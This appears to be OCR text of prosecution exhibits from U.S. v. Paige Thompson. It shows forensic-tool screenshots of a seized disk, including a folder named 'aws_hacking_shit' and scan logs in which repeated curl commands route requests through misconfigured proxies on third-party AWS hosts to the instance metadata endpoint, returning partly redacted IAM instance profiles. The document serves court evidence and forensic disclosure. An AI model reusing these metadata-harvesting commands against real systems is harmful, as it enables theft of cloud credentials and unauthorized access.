| limits.conf | existing | ascii_u... | 268 B | 07/10/2019 10:16... | 04/06/2019 18:05... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,628... |
| ip-ranges.json | existing, already viewed | json | 197 KB | 07/10/2019 10:16... | 03/01/2019 10:21... | 07/19/2019 06:24... | Crwxrwxrwx | 26,332,368 |
| infobloxctodockerstuff.sh | existing | sh | 4.4 KB | 07/10/2019 10:17... | 03/14/2019 08:25... | 07/19/2019 06:24... | Crwxrwxrwx | 28,331,680 |

Partition File Preview Details Gallery Calendar Legend Raw Text

```
../metadata_old4/52.74.60.204:443:ami-id
../metadata_old4/3.83.242.169:443:ami-id
../metadata_old4/52.210.225.235:443:ami-id
../metadata_old4/54.214.50.238:443:ami-id
../metadata_old4/34.205.178.115:80:ami-id
../metadata_old4/18.209.225.93:80:ami-id
../metadata_old4/34.213.27.38:443:ami-id
../metadata_old4/52.196.76.216:80:<html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">ami-id
../metadata_old4/13.113.12.133:80:ami-id
../metadata_old4/52.208.97.11:443:ami-id
../metadata_old4/34.242.245.102:443:ami-id
../metadata_old4/52.86.111.16:80:ami-id
../metadata_old4/54.162.202.98:443:ami-id
../metadata_old4/18.209.2.12:443:ami-id
../metadata_old4/52.90.137.8:80:ami-id
../metadata_old4/13.57.7.185:80:ami-id
../metadata_old4/34.201.163.169:443:ami-id
../metadata_old4/34.197.128.100:443:ami-id
../metadata_old4/35.154.251.51:443:ami-id
../metadata_old4/54.174.65.134:80:ami-id
../metadata_old4/13.229.149.238:443:ami-id
../metadata_old4/100.25.211.127:80:ami-id
../metadata_old4/52.31.8.36:443:ami-id
../metadata_old4/184.72.249.27:443:ami-id
../metadata_old4/100.26.57.181:80:ami-id
../metadata_old4/52.64.104.205:443:ami-id
../metadata_old4/52.66.77.130:443:ami-id
../metadata_old4/174.129.17.248:443:ami-id
../metadata_old4/54.207.9.93:443:ami-id
../metadata_old4/52.59.195.80:443:ami-id
../metadata_old4/52.18.89.222:443:ami-id
../metadata_old4/52.202.171.240:443:ami-id
../metadata_old4/52.52.171.1:443:ami-id
../metadata_old4/52.29.7.60:443:ami-id
../metadata_old4/34.204.166.231:443:ami-id
../metadata_old4/35.168.25.243:443:ami-id
../metadata_old4/54.156.183.45:80:ami-id
../metadata_old4/3.89.177.190:80:<html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">ami-id
../metadata_old4/54.72.195.241:443:ami-id
```

mega_metadata.txt

```
 1   34.203.227.201:443:ami-id
 2   54.255.226.147:443:ami-id
 3   13.228.13.116:443:ami-id
 4   52.50.114.108:443:ami-id
 5   54.194.234.17:443:ami-id
 6   35.174.95.137:80:ami-id
 7   52.55.150.227:443:ami-id
 8   3.80.135.207:80:ami-id
 9   52.213.221.16:443:ami-id
10   13.232.74.206:80:ami-id
11   34.233.5.227:80:ami-id
12   34.233.5.227:443:ami-id
13   13.251.122.190:443:ami-id
14   35.168.232.110:443:ami-id
15   54.223.175.32:443:ami-id
16   18.130.245.251:443:ami-id
17   63.32.127.100:443:ami-id
18   3.83.242.169:80:ami-id
19   18.130.169.121:443:ami-id
20   54.77.46.101:443:ami-id
21   34.253.221.101:443:ami-id
22   3.87.29.227:80:ami-id
23   35.174.208.165:80:ami-id
24   54.233.188.211:80:ami-id
25   52.5.19.114:443:ami-id
26   35.168.208.144:80:ami-id
27   35.168.208.144:443:ami-id
28   13.233.31.108:80:ami-id
29   18.231.94.56:443:ami-id
30   18.205.47.75:443:ami-id
31   54.232.231.134:443:ami-id
32   3.120.251.179:80:ami-id
33   52.57.128.255:443:ami-id
34   35.157.22.118:443:ami-id
35   52.210.225.235:443:ami-id
36   18.184.143.8:443:ami-id
37   18.195.209.161:443:ami-id
38   54.85.167.138:443:ami-id
39   52.208.25.41:443:ami-id
40   35.162.65.136:443:ami-id
41   ../metadata_old2/18.207.213.8.metadata.8888:ami-id
42   ../metadata_old2/13.233.67.216.metadata.443:ami-id
43   ../metadata_old2/23.22.9.234.metadata.80:ami-id
44   ../metadata_old2/122.248.238.156.metadata.443:ami-id
45   ../metadata_old2/52.91.2.197.metadata.443:ami-id
46   ../metadata_old2/52.199.114.150.metadata.8001:ami-id
47   ../metadata_old2/54.162.202.98.metadata.80:ami-id
48   ../metadata_old2/52.207.132.15.metadata.443:ami-id
49   ../metadata_old2/35.174.95.137.metadata.80:ami-id
50   ../metadata_old2/34.245.86.161.metadata.8888:ami-id
51   ../metadata_old2/52.20.131.53.metadata.443:ami-id
52   ../metadata_old2/34.213.27.38.metadata.443:ami-id
53   ../metadata_old2/54.238.181.176.metadata.80:ami-id
54   ../metadata_old2/52.4.234.164.metadata.443:ami-id
55   ../metadata_old2/54.218.1.67.metadata.443:ami-id
56   ../metadata_old2/54.189.245.163.metadata.443:ami-id
57   ../metadata_old2/54.252.210.83.metadata.81:ami-id
58   ../metadata_old2/54.214.50.238.metadata.443:ami-id
59   ../metadata_old2/34.203.219.137.metadata.443:ami-id
60   ../metadata_old2/54.89.239.139.metadata.3128:ami-id
61   ../metadata_old2/3.104.89.98.metadata.443:ami-id
62   ../metadata_old2/52.193.82.153.metadata.3128:ami-id
63   ../metadata_old2/35.161.229.177.metadata.3128:ami-id
```

643-005





X-Ways Forensics: 1B52-md126-results - [1b52-md126-luksopen, Volume]

File Edit Search Navigation View Tools Specialist Options Window Help 20.4 x64

Case Data

File Edit

- .shutter (3)
- .snes9x (1)
- .snowmix (0)
- .ssh (60)
- .stardict (0)
- .steam (11)
- .subversion (3)
- .terraform.d (2)
- .thumbnails (22)
- .travis (2)
- .uml (0)
- .var (133,386)
- .vbox (1)
- .vice (0)
- .w3m (4)
- .weechat (24)
- .wetfish_images (13,422)
- .wine (3,030)
- .xdg_menu_cache (2)
- .xine (0)
- .znc (3,651)
- annoying (3)
- audio-projects (0)
- aws_hacking_shit (5,549,429)
  - aws_scan (3,868,755)
  - AWSSCAN (518,566)
  - AWSScanner (10,133)
  - azure_scan (126,759)
  - AZURESCAN (190,920)
  - cicd-instance (834,186)
  - miner (61)
- AWSScanner (10,040)
- bin (1)
- cantv (1,518,520)
- cookies (0)
- cpsumon (192)
- craigslist (6)
- Desktop (9)
- docker-compose-etcd (49)
- docker-monero (5)
- Documents (877)
- Downloads (104)
- ec2sshroot (4,540)
- exploitdb (42,397)
- f5-agility-labs-iam (1,217)
- FreeBSD (2)
- Github_Backup (19,799)
- Gmail-2018 (2)
- GNUstep (57,503)
- google-cloud-sdk (8,712)
- GOOGLESCAN (98,252)

1b52-md126-luksopen, Vol...

\home\erratic\aws_hacking_shit\aws_scan 83 files (83), 17 dir.

| Name | Description | Type | Size | Created | Modified | Record changed | Attr. | 1st sector | Metadata | Device type |
|---|---|---|---|---|---|---|---|---|---|---|
| .. = aws_hacking_shit (5,549,429) | existing, tagged | | 109 GB | 07/10/2019 09:42... | 07/02/2019 17:30... | 07/19/2019 06:21... | rwxrwxr... | 7,044,587... | | |
| . = aws_scan (3,868,755) | existing, tagged | | 17.6 GB | 07/10/2019 10:05... | 05/29/2019 01:10... | 07/19/2019 06:22... | rwxrwxr... | 5,222,080... | | |
| docker.sh | existing, tagged | sh | 1.4 KB | 07/10/2019 10:19... | 03/14/2019 07:59... | 07/19/2019 06:24... | rwxrwxr... | 11,675,07... | | |
| pass | existing, tagged | | 17 B | 07/10/2019 10:19... | 03/14/2019 07:13... | 07/19/2019 06:24... | rwxrwxr... | 11,675,07... | | |
| events.pcap | existing, tagged | pcap | 10.6 MB | 07/10/2019 10:18... | 03/14/2019 05:59... | 07/19/2019 06:24... | Crwxrw... | 34,353,032 | | |
| csp.redirect.server.ec2.tags | existing, tagged | tags | 3.6 KB | 07/10/2019 10:18... | 03/14/2019 04:53... | 07/19/2019 06:24... | Crwxrw... | 7,233,501... | | |
| csp.redirect.server.ec2.user-data | existing, tagged | user-d... | 12.2 KB | 07/10/2019 10:19... | 03/14/2019 04:51... | 07/19/2019 06:24... | Crwxrw... | 41,052,568 | | |
| 14-03-19.non443.log | existing, tagged | log | 12.0 KB | 07/10/2019 10:16... | 03/14/2019 04:25... | 07/19/2019 06:24... | Crwxrw... | 26,332,408 | | |
| ajaykanthei | existing, tagged | | 9.6 MB | 07/10/2019 10:17... | 03/14/2019 03:07... | 07/19/2019 06:24... | Crwxrw... | 31,378,240 | | |
| 14-03.19 | existing, tagged | 19 | 4.1 KB | 07/10/2019 10:16... | 03/14/2019 02:53... | 07/19/2019 06:24... | Crwxrw... | 26,332,360 | | |
| cicd-instance.us-west-2.ec2.instances | existing, tagged | instanc... | 552 KB | 07/10/2019 10:17... | 03/12/2019 12:29... | 07/19/2019 06:24... | Crwxrw... | 31,370,256 | | |
| cicd-instance.us-west-1.ec2.instances | existing, tagged | ascii_u... | 27 B | 07/10/2019 10:17... | 03/12/2019 12:28... | 07/19/2019 06:24... | rwxrwxr... | 7,053,666... | | |
| cicd-instance.us-east-2.ec2.instances | existing, tagged | instanc... | 27 B | 07/10/2019 10:17... | 03/12/2019 12:27... | 07/19/2019 06:24... | rwxrwxr... | 7,053,666... | | |
| cicd-instance.us-east-1.ec2.instances | existing, tagged, already v... | ascii_u... | 27 B | 07/10/2019 10:17... | 03/12/2019 12:27... | 07/19/2019 06:24... | rwxrwxr... | 7,053,666... | | |
| 54.164.114.241.binary.user-data | existing, tagged | user-d... | 1.6 KB | 07/10/2019 10:16... | 03/12/2019 11:20... | 07/19/2019 06:24... | rwxrwxr... | 7,053,619... | | |
| 11-3-19.non443.log | existing, tagged, already v... | log | 43.1 KB | 07/10/2019 10:08... | 03/12/2019 01:35... | 07/19/2019 06:22... | Crwxrw... | 18,589,704 | | |
| 11-3-19.443.log | existing, tagged, already v... | log | 280 KB | 07/10/2019 10:08... | 03/11/2019 22:01... | 07/19/2019 06:22... | Crwxrw... | 18,586,160 | | |
| 11-3-19 | existing, tagged | | 16.5 KB | 07/10/2019 10:08... | 03/11/2019 21:40... | 07/19/2019 06:22... | Crwxrw... | 18,586,152 | | |
| 9-3-19.non443.log | existing, tagged | log | 28.8 KB | 07/10/2019 10:17... | 03/09/2019 23:36... | 07/19/2019 06:24... | Crwxrw... | 28,310,816 | | |
| 9-03-19.443.log | existing, tagged | log | 268 KB | 07/10/2019 10:17... | 03/09/2019 16:08... | 07/19/2019 06:24... | Crwxrw... | 36,516,728 | | |
| 9-3-19 | existing, tagged | | 12.1 KB | 07/10/2019 10:17... | 03/09/2019 15:57... | 07/19/2019 06:24... | Crwxrw... | 28,292,696 | | |
| nano | existing, tagged, already v... | | 0 B | 07/10/2019 10:17... | 03/08/2019 18:39... | 07/19/2019 06:24... | rwxrwxr... | 7,053,709... | | |
| astem.newuser | existing, tagged | newuser | 0.5 KB | 07/10/2019 10:17... | 03/08/2019 04:41... | 07/19/2019 06:24... | rwxrwxr... | 7,053,709... | | |
| astem.role.sshkey | existing, tagged | sshkey | 1.8 KB | 07/10/2019 10:17... | 03/08/2019 04:32... | 07/19/2019 06:24... | rwxrwxr... | 7,053,709... | | |
| astem-role | existing, tagged | | 75.3 KB | 07/10/2019 10:17... | 03/08/2019 04:26... | 07/19/2019 06:24... | Crwxrw... | 28,338,432 | | |
| convox-us-east-1.ec2 | existing, tagged | ec2 | 1.5 MB | 07/10/2019 10:17... | 03/08/2019 03:04... | 07/19/2019 06:24... | Crwxrw... | 30,589,168 | | |
| tmp3 | existing, tagged | | 1.2 MB | 07/10/2019 10:17... | 03/08/2019 00:01... | 07/19/2019 06:24... | Crwxrw... | 28,470,928 | | |
| tmp2 | existing, tagged | | 513 KB | 07/10/2019 10:17... | 03/07/2019 23:01... | 07/19/2019 06:24... | Crwxrw... | 28,341,992 | | |
| tmp | existing, tagged | | 1.2 MB | 07/10/2019 10:17... | 03/07/2019 22:50... | 07/19/2019 06:24... | Crwxrw... | 28,310,784 | | |
| ec2_run_instance.sh | existing, tagged | sh | 438 B | 07/10/2019 10:17... | 03/07/2019 22:24... | 07/19/2019 06:24... | rwxrwxr... | 7,053,709... | | |
| 7-03-19.443.log | existing, tagged, already v... | log | 83.5 KB | 07/10/2019 10:17... | 03/07/2019 20:46... | 07/19/2019 06:24... | Crwxrw... | 28,340,264 | | |
| 7-03-19.non443.log | existing, tagged, already v... | log | 20.3 KB | 07/10/2019 10:17... | 03/07/2019 19:41... | 07/19/2019 06:24... | Crwxrw... | 28,292,504 | | |
| 7-03-19 | existing, tagged | | 8.8 KB | 07/10/2019 10:17... | 03/07/2019 19:21... | 07/19/2019 06:24... | Crwxrw... | 26,015,496 | | |
| fuseos-dev-compute.ec2_instances.us-east-1 | existing, tagged | us-east... | 1.0 MB | 07/10/2019 10:17... | 03/05/2019 13:57... | 07/19/2019 06:24... | Crwxrw... | 20,839,264 | | |
| new-ec2-credentials-describe-instances | existing, tagged | | 115 KB | 07/10/2019 10:16... | 03/04/2019 10:08... | 07/19/2019 06:24... | Crwxrw... | 26,332,328 | | |
| another_ec2_instance_role | existing, tagged | | 3.8 KB | 07/10/2019 10:16... | 03/04/2019 09:44... | 07/19/2019 06:24... | Crwxrw... | 7,053,619... | | |
| ami-id.tar | existing, tagged | tar | 100 KB | 07/10/2019 10:16... | 03/04/2019 08:57... | 07/19/2019 06:24... | Crwxrw... | 26,332,312 | | |
| https_ports.txt | existing, tagged | txt | 9 B | 07/10/2019 10:17... | 03/04/2019 00:37... | 07/19/2019 06:24... | rwxrwxr... | 7,053,672... | | |
| ports.txt | existing, tagged | txt | 96 B | 07/10/2019 10:17... | 03/04/2019 00:37... | 07/19/2019 06:24... | rwxrwxr... | 7,053,672... | | |
| all_shuf.xz | existing, tagged | xz | 148 MB | 07/10/2019 10:17... | 03/03/2019 22:41... | 07/19/2019 06:24... | rwxrwxr... | 33,304,472 | | |
| spool.sh | existing, tagged | sh | 184 B | 07/10/2019 10:16... | 03/03/2019 22:25... | 07/19/2019 06:24... | rwxrwxr... | 7,053,619... | | |
| ip-ranges.json | existing, tagged | json | 197 KB | 07/10/2019 10:16... | 03/01/2019 10:21... | 07/19/2019 06:24... | Crwxrw... | 26,332,368 | | |
| deploy.sh | existing, tagged | sh | 6.3 KB | 07/10/2019 10:16... | 10/04/2018 13:21... | 07/19/2019 06:24... | Crwxrw... | 26,332,352 | | |

Partition File Preview Details Gallery Calendar Legend Raw Text Selected: 1 file (20.3 KB)

```
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 100.25.48.94:80 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 54.200.124.191:3129 http://169.254.169.254/latest/meta-data/iam/info
{
  "Code" : "Success",
  "LastUpdated" : "2019-03-08T03:30:38Z",
  "InstanceProfileArn" : "arn:aws:iam:[redacted]5156:instance-profile/[redacted]
  "InstanceProfileId" : "[redacted]3OTR"
}curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 35.164.189.79:80 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 54.65.254.5:3128 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 18.203.85.234:8888 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 54.166.77.120:3128 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 13.126.154.214:80 http://169.254.169.254/latest/meta-data/iam/info
curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 52.87.83.135:80 http://169.254.169.254/latest/meta-data/iam/info
<html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">{
  "Code" : "Success",
  "LastUpdated" : "2019-03-08T02:59:52Z",
```

\1b52-md126-luksopen, Volume\home\erratic\aws_hacking_shit\aws_scan\7-03-19.non443.log

Left and right mouse buttons to rotate, middle mouse button to mirror, with Shift to flip

```
7-03-19.443.log ⊠

 1  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.214.25.54:443 http://169.254.169.254/latest/meta-data/iam/info
 2  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.170.197.205:443 http://169.254.169.254/latest/meta-data/iam/info
 3  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.127.161.88:443 http://169.254.169.254/latest/meta-data/iam/info
 4  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.236.16.20:443 http://169.254.169.254/latest/meta-data/iam/info
 5  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.62.80.179:443 http://169.254.169.254/latest/meta-data/iam/info
 6  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://176.34.104.30:443 http://169.254.169.254/latest/meta-data/iam/info
 7  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.59.28.187:8443 http://169.254.169.254/latest/meta-data/iam/info
 8  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.196.146.101:443 http://169.254.169.254/latest/meta-data/iam/info
 9  {
10    "Code" : "Success",
11    "LastUpdated" : "2019-03-08T04:04:13Z",
12    "InstanceProfileArn" : "arn:aws:iam::        5582:instance-profile/
13    "InstanceProfileId" :                  Y3RQ"
14  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.239.215.158:443 http://169.254.169.254/latest/meta-data/iam/info
15  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.235.8.209:443 http://169.254.169.254/latest/meta-data/iam/info
16  {
17    "Code" : "Success",
18    "LastUpdated" : "2019-03-08T04:29:28Z",
19    "InstanceProfileArn" : "arn:aws:iam::        6483:instance-profile/
20    "InstanceProfileId" :                  LEI6"
21  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.32.47.236:443 http://169.254.169.254/latest/meta-data/iam/info
22  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.209.134.131:443 http://169.254.169.254/latest/meta-data/iam/info
23  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.127.129.251:8443 http://169.254.169.254/latest/meta-data/iam/info
24  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://63.35.67.210:443 http://169.254.169.254/latest/meta-data/iam/info
25  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.59.4.171:443 http://169.254.169.254/latest/meta-data/iam/info
26  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.214.172.29:443 http://169.254.169.254/latest/meta-data/iam/info
27  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.72.63.104:443 http://169.254.169.254/latest/meta-data/iam/info
28  {
29    "Code" : "Success",
30    "LastUpdated" : "2019-03-08T04:02:16Z",
31    "InstanceProfileArn" : "arn:aws:iam::        8609:instance-profile/
32    "InstanceProfileId" :                  7YVA"
33  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.18.89.222:443 http://169.254.169.254/latest/meta-data/iam/info
34  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.232.146.106:443 http://169.254.169.254/latest/meta-data/iam/info
35  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://3.80.208.26:443 http://169.254.169.254/latest/meta-data/iam/info
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 644
Admitted_____

```
7-03-19.443.log
 70  {
 71      "Code" : "Success",
 72      "LastUpdated" : "2019-03-08T03:47:06Z",
 73      "InstanceProfileArn" : "arn:aws:iam::        1427:instance-profile/
 74      "InstanceProfileId" :                    NY22"
 75  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.220.114.11:443 http://169.254.169.254/latest/meta-data/iam/info
 76  {
 77      "Code" : "Success",
 78      "LastUpdated" : "2019-03-08T04:13:33Z",
 79      "InstanceProfileArn" : "arn:aws:iam::        3701:instance-profile/
 80      "InstanceProfileId" :                    QDMK"
 81  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.239.93.133:443 http://169.254.169.254/latest/meta-data/iam/info
 82  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.201.2.203:443 http://169.254.169.254/latest/meta-data/iam/info
 83  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.56.232.56:443 http://169.254.169.254/latest/meta-data/iam/info
 84  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.234.97.18:443 http://169.254.169.254/latest/meta-data/iam/info
 85  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.213.111.76:443 http://169.254.169.254/latest/meta-data/iam/info
 86  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.220.49.141:443 http://169.254.169.254/latest/meta-data/iam/info
 87  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.72.210.220:443 http://169.254.169.254/latest/meta-data/iam/info
 88  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.76.48.213:443 http://169.254.169.254/latest/meta-data/iam/info
 89  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.127.58.24:443 http://169.254.169.254/latest/meta-data/iam/info
 90  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.38.170.131:443 http://169.254.169.254/latest/meta-data/iam/info
 91  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.198.107.105:443 http://169.254.169.254/latest/meta-data/iam/info
 92  {
 93      "Code" : "Success",
 94      "LastUpdated" : "2019-03-08T04:10:37Z",
 95      "InstanceProfileArn" : "arn:aws:iam::        3769:instance-profile/
 96      "InstanceProfileId" :                    WRXO"
 97  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://3.121.200.114:443 http://169.254.169.254/latest/meta-data/iam/info
 98  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.173.210.136:443 http://169.254.169.254/latest/meta-data/iam/info
 99  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.28.237.205:443 http://169.254.169.254/latest/meta-data/iam/info
100  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.53.193.8:443 http://169.254.169.254/latest/meta-data/iam/info
101  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.232.178.225:443 http://169.254.169.254/latest/meta-data/iam/info
102  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://3.122.165.203:443 http://169.254.169.254/latest/meta-data/iam/info
103  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.207.214.233:443 http://169.254.169.254/latest/meta-data/iam/info
104  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.83.240.42:443 http://169.254.169.254/latest/meta-data/iam/info
105  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.44.237.253:443 http://169.254.169.254/latest/meta-data/iam/info
106  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.236.133.181:8443 http://169.254.169.254/latest/meta-data/iam/info
107  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.173.172.115:443 http://169.254.169.254/latest/meta-data/iam/info
108  {
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 645
Admitted_____

```
 11-3-19.443.log
712  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.177.138.235:443 http://169.254.169.254/latest/meta-data/iam/info
713  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.213.161.24:443 http://169.254.169.254/latest/meta-data/iam/info
714  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.230.171.1:443 http://169.254.169.254/latest/meta-data/iam/info
715  {
716     "Code" : "Success",
717     "LastUpdated" : "2019-03-12T04:10:32Z",
718     "InstanceProfileArn" : "arn:aws:iam::          5972:instance-profile/
719     "InstanceProfileId" :                  7YSS"
720  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.47.65.5:443 http://169.254.169.254/latest/meta-data/iam/info
721  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.250.156.187:443 http://169.254.169.254/latest/meta-data/iam/info
722  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.70.60.107:443 http://169.254.169.254/latest/meta-data/iam/info
723  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.202.59.236:443 http://169.254.169.254/latest/meta-data/iam/info
724  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.71.50.166:443 http://169.254.169.254/latest/meta-data/iam/info
725  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.168.58.7:443 http://169.254.169.254/latest/meta-data/iam/info
726  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.55.1.43:443 http://169.254.169.254/latest/meta-data/iam/info
727  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.56.238.255:443 http://169.254.169.254/latest/meta-data/iam/info
728  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.203.56.75:443 http://169.254.169.254/latest/meta-data/iam/info
729  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.245.165.172:443 http://169.254.169.254/latest/meta-data/iam/info
730  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.234.188.25:443 http://169.254.169.254/latest/meta-data/iam/info
731  {
732     "Code" : "Success",
733     "LastUpdated" : "2019-03-12T04:53:27Z",
734     "InstanceProfileArn" : "arn:aws:iam::        9784:instance-profile/
735     "InstanceProfileId" :                  P446"
736  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.82.157.155:443 http://169.254.169.254/latest/meta-data/iam/info
737  {
738     "Code" : "Success",
739     "LastUpdated" : "2019-03-12T04:16:18Z",
740     "InstanceProfileArn" : "arn:aws:iam::        5804:instance-profile/
741     "InstanceProfileId" :                  IMR6"
742  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.197.63.165:443 http://169.254.169.254/latest/meta-data/iam/info
743  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.208.62.195:443 http://169.254.169.254/latest/meta-data/iam/info
744  {
745     "Code" : "Success",
746     "LastUpdated" : "2019-03-12T04:35:09Z",
747     "InstanceProfileArn" : "arn:aws:iam::        7507:instance-profile/
748     "InstanceProfileId" :                  UVWW"
749  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.157.132.103:443 http://169.254.169.254/latest/meta-data/iam/info
750  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.242.190.101:443 http://169.254.169.254/latest/meta-data/iam/info
751  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.170.159.42:443 http://169.254.169.254/latest/meta-data/iam/info
752  {
753     "Code" : "Success",
754     "LastUpdated" : "2019-03-12T04:14:51Z",
755     "InstanceProfileArn" : "arn:aws:iam::        9479:instance-profile/
756     "InstanceProfileId" :                  OWXO"
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 646
Admitted_____

14-03-19.non443.log ❎

```
25  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.112.1.238:8080 http://169.254.169.254/latest/meta-data/iam/info
26  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.236.213.222:808 http://169.254.169.254/latest/meta-data/iam/info
27  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.222.164.7:8118 http://169.254.169.254/latest/meta-data/iam/info
28  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://52.21.97.41:80 http://169.254.169.254/latest/meta-data/iam/info
29  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.154.18.220:80 http://169.254.169.254/latest/meta-data/iam/info
30  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://63.35.180.125:8888 http://169.254.169.254/latest/meta-data/iam/info
31  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.223.224.37:81 http://169.254.169.254/latest/meta-data/iam/info
32  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.234.62.16:80 http://169.254.169.254/latest/meta-data/iam/info
33  {
34      "Code" : "Success",
35      "LastUpdated" : "2019-03-14T10:46:23Z",
36      "InstanceProfileArn" : "arn:aws:iam::          7295:instance-profile/
37      "InstanceProfileId" :                     NY6Y"
38  }curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.17.182.157:3128 http://169.254.169.254/latest/meta-data/iam/info
39  curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://35.164.142.129:3129 http://169.254.169.254/latest/meta-data/iam/info
40  {
41      "Code" : "Success",
42      "LastUpdated" : "2019-03-14T10:35:40Z",
43      "InstanceProfileArn" : "arn:aws:iam:          5156:instance-profile/
44      "InstanceProfileId" :                     3OTR"
